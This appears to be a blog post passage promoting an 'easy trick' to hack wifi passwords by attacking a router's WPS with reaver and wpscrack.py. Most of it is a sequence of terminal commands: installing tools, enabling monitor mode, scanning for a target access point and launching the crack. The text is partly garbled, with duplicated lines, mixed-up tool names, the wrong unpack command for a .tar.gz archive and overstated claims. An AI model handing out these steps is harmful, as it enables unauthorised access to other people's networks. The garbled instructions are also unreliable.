attacks through which WPS could be accessed. WPS vulnerability can be
exploit through “reaver” & “wpscrack“. Password can be easily
recovered instantly once attack on WPS initiated, Usually it takes hours to
crack if upper & lower case letters are combined in it.
No router is safe from these attacks, even if WPS is disabled it will still allow
attack on most of the routers. So let’s start how to Hack wifi Password Easy
Trick. Just follow these simple steps.
Requirement’s
- Linux OS
- Home Router with WPS
- Install these softwares: aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
Tools
Crack WPA
Terminal command is in Green.
- Follow this easy guide for the tools you will use.
___________________________________________
Reaper
>> Un-zip Reaper.
unzip reaver-1.3.tar.gz
unzip reaver-1.3.tar.gz
.
cd reaper-1.3
./configure && make && sudo make install
sudo iwlist scan wlan0
sudo airmon-ng start wlan0
reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
wpscrack.py
>>Make this program executable by this command.
chmod +x wpscrack.py
chmod +x wpscrack.py
>>Scan the access point for attack, & copy the MAC
address (XX:XX:XX:XX:XX:XX).
sudo iwlist scan wlan0
sudo iwlist scan wlan0
>>Get the MAC address & save it.
ip link show wlan0 | awk ‘/ether/ {print $2}’
ip link show wlan0 | awk ‘/ether/ {print $2}’
>>Set Monitor mode by this command.
sudo airmon-ng start wlan0
sudo airmon-ng start wlan0
>>Attack AP.
wpscrack.py –iface mon0 –client <your MAC adress, because you
wpscrack.py –iface mon0 –client <your MAC adress, because you
are attacking yourself > –bssid <AP MAC address> –ssid <name of
your AP> -v
>>Await victory.
>>Await victory.
________________
No comments:
Post a Comment